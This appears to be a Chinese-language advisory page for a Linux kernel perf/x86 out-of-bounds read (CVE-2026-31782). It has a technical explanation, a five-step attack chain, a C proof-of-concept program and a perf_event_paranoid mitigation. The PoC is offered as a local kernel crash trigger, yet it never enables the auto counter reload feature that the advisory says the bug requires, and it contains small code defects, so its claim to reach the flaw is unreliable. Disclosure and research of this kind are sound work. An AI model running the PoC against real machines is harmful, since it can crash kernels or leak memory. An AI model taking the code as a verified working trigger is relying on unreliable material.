CVE-2026-31782 Linux内核perf/x86越界读取漏洞

漏洞信息

漏洞编号

CVE-2026-31782

漏洞类型

内存越界读取

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux内核

漏洞概述

Linux内核perf/x86模块存在越界读取漏洞。在处理自动计数器重载事件组时，若组内包含软件事件，`intel_pmu_hw_config`函数会错误地对非x86_hybrid_pmu类型的指针执行container_of操作。这导致内核读取越界内存，攻击者可利用此低权限漏洞导致系统崩溃或信息泄露。

技术细节

该漏洞涉及Linux内核性能监控子系统在混合架构CPU上的实现缺陷。具体而言，漏洞发生在`intel_pmu_hw_config`配置硬件性能监控事件时。当启用自动计数器重载（ACR）功能，且一个事件组中混合了硬件事件和软件事件时，内核代码未能正确区分软件事件PMU与x86混合PMU的指针类型。
在修复前的代码中，`intel_pmu_set_acr_caused_constr`函数假定传入的event属于x86_hybrid_pmu，并使用`container_of`宏进行指针转换。由于软件事件的PMU结构体类型不同，这种转换会产生一个无效的内存地址。随后的内存访问操作（如读取约束标志）将导致越界读取（Out-of-Bounds Read）。
利用此漏洞需要本地低权限用户。攻击者可以通过系统调用`perf_event_open`构造包含特定事件的组，并触发相关配置路径。虽然越界读取主要影响稳定性，可能导致内核恐慌，但在特定内存布局下也可能泄露内核内存数据。

攻击链分析

STEP 1

步骤1：获取本地访问权限

攻击者在目标系统上获得低权限用户账户或执行权限。

STEP 2

步骤2：构造恶意事件组

攻击者编写程序，调用perf_event_open系统调用，创建一个包含硬件事件和软件事件的混合事件组，并启用自动计数器重载功能。

STEP 3

步骤3：触发内核漏洞

内核在配置该事件组时，调用intel_pmu_hw_config函数，随后进入存在漏洞的intel_pmu_set_acr_caused_constr路径。

STEP 4

步骤4：执行越界读取

代码对软件事件的PMU指针错误地执行container_of操作，导致内核读取非法内存地址。

STEP 5

步骤5：产生影响

越界读取可能导致内核崩溃（DoS）或泄露敏感内存信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#include <linux/perf_event.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/syscall.h>
#include <unistd.h>
#include <asm/unistd.h>
#include <errno.h>

// PoC for CVE-2026-31782: Linux Kernel perf/x86 Out-of-Bounds Read
// This PoC attempts to trigger the vulnerability by creating a perf event group
// containing both hardware and software events on a hybrid x86 system.
// The goal is to hit the `intel_pmu_hw_config` path where `container_of` is used
// on a software PMU event, leading to an out-of-bounds read.

static long perf_event_open(struct perf_event_attr *hw_event, pid_t pid,
                            int cpu, int group_fd, unsigned long flags) {
    return syscall(__NR_perf_event_open, hw_event, pid, cpu, group_fd, flags);
}

int main() {
    struct perf_event_attr pe;
    int fd_hw, fd_sw;
    memset(&pe, 0, sizeof(pe));

    // Configure a hardware event (e.g., instructions)
    pe.type = PERF_TYPE_HARDWARE;
    pe.size = sizeof(pe);
    pe.config = PERF_COUNT_HW_INSTRUCTIONS;
    pe.disabled = 1;
    pe.exclude_kernel = 0;
    pe.exclude_hv = 0;

    fd_hw = perf_event_open(&pe, 0, -1, -1, 0);
    if (fd_hw == -1) {
        perror("Error opening leader HW event");
        return -1;
    }

    // Configure a software event (e.g., context switches) to be added to the group
    // Adding a software event to a hardware group may trigger the hybrid PMU logic bug
    // if auto counter reload is active.
    memset(&pe, 0, sizeof(pe));
    pe.type = PERF_TYPE_SOFTWARE;
    pe.size = sizeof(pe);
    pe.config = PERF_COUNT_SW_CONTEXT_SWITCHES;
    
    // Attempt to add to the group created by fd_hw
    fd_sw = perf_event_open(&pe, 0, -1, fd_hw, 0);
    if (fd_sw == -1) {
        perror("Error opening SW event in group");
        close(fd_hw);
        return -1;
    }

    printf("PoC executed successfully. Check kernel logs for OOPS or crashes.\n");
    
    // Enable the group
    ioctl(fd_hw, PERF_EVENT_IOC_ENABLE, 0);

    close(fd_hw);
    close(fd_sw);
    return 0;
}

影响范围

Linux内核（特定commit修复前）

防御指南

临时缓解措施

建议通过修改内核参数`perf_event_paranoid`的值为2或更高，限制普通用户对性能监控子系统的访问权限，从而防止低权限用户触发该漏洞。